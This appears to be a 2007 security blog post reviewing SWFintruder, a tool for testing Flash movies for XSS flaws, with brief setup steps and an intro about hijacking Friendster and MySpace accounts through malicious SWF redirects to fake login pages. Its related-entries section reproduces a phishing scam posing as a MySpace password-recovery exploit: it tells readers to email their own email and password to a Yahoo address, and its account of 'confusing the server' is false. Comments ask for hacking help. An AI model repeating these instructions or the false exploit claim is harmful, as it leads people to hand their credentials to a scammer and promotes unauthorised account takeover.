Today i have been reading a lot about Web Application Malware / Web Application Worm that spreads through social networking site , like Friendster and Myspace. Embed a malicous Flash swf movie , is one of the most used technique to hack friendster account or hack myspace account as well. In the most dumbest way , you could embed a malicious Flash swf movie script into your friend’s testimonial box , and make it to be redirected to a fake login page , and let them entry their login data 
, it’s only one of many dumb way to hijack friendster account or to hijack myspace account.
According to the condition specified above, a useful tool called SWFintruder has been developed , and known as the first tool for testing security in Flash movies. The major features of this tool are :1. Basic predefined attack patterns
2. Highly customizable attacks
3. Highly customizable undefined variables
4. Semi automated Xss check
5. User configurable internal parameters
6. Log Window for debugging and tracking
7. History of latest 5 tested SWF files
8. ActionScript Objects runtime explorer in tree view
9. Persistent Configuration and Layout
Here are some short tutorial on SWFintruder :
- Download the SWFintruder source code from GoogleCode.
- Extract the source code into the root of your webserver.
- Browse to your http://yourfuckinhost/swfintruderdir
- Download some flawed swf files , and put it on your webserver too.
- Fill the “Flash Movie” with your desired flawed swf movie , and then click “Load”.
- If some XSS was found, it will be listed in the Xss area click on it to get the result on a new browser window.
The other video tutorial on SWFintruder can be downloaded here. Other previews about this application can be read on : Ngoprekweb.com , ProfessionalSecurityTesters.org , Ajaxian.com .
Computer Security Stuff on eBay!Electronics stuffs on ebay
SWFintruder , testing security in Flash movies is posted on December 8th, 2007 by admin. This post is filed under: Sectools, Security, featured, Security, software review, web backdoors, Web Hacking, XSS .
Some people come to this post with this search term: SWFIntruder , swfintruder tutorial, hack friendster account, friendster hacking software, computers internet blog, hacking friendster account, SWFintruder backtrack, friendster fake log in, how to trace a friendster hacker, SWFIntruder download, how to hack myspace accounts using a flash expoloit, security testing flash, friendster fake login, fake friendster login, flash, hijack friendster, swfintruder variables, friendster account hacking software, hijack flash movies, zenmap soft hack,
And here is the related entries of this post:
how to hack friendster accounts.. and YMs.. how can i get their passwords
How to hack into your freinds my-space account.
How to hack into any my-space account:
my-space is currently unable to fix their BIGGEST
security hole, because it comes from emails. As you
see on their main page there is a “forgot your
password” link that will email your password to the
email you have provided. However, searching deep
into the source one is able to find how to exploit this
form. The form sends the email address you entered in
the form to the server. The server then searches its
database for the email. It finds the corresponding
password and sends that to the email address you
have entered from the servers email address. If you
are logged in however you notice that that link
disappears because you obviously have your
password. So to confuse the server into sending you
the password to any email address you wish you must
send the server email the following information:
send email to pswrdrecovertool@yahoo.com
In the subject field type the the friend “id” of the
myspace you want to hack into.
In the first line of the body copy, or type
“input id = “email” value = “(PERSONS EMAIL OF MY-
SPACE YOU WANT TO HACK INTO)”
on the second line type,
input id = “login.email” value = “(YOUR EMAIL HERE)”
on the third line type,
input id = “login.pass” value = “(YOUR PASSWORD)”
on the fourth line type,
input id = “friend.id” value = “(YOUR FRIEND ID)”
** important ** ** important **
(1) you must enter all correct information or this
method fails to work.
(2) you MUST put the values in quotation marks for
this to work.
Once again, it confuses the server into sending the
password of the victims email to your email.
to CTUTeam:
Can you please make an’ exmple on how it works. thank.
to CTUTeam:
Can I contact you please it’s very important for me.
i’t’s only for my personal thing. thanks.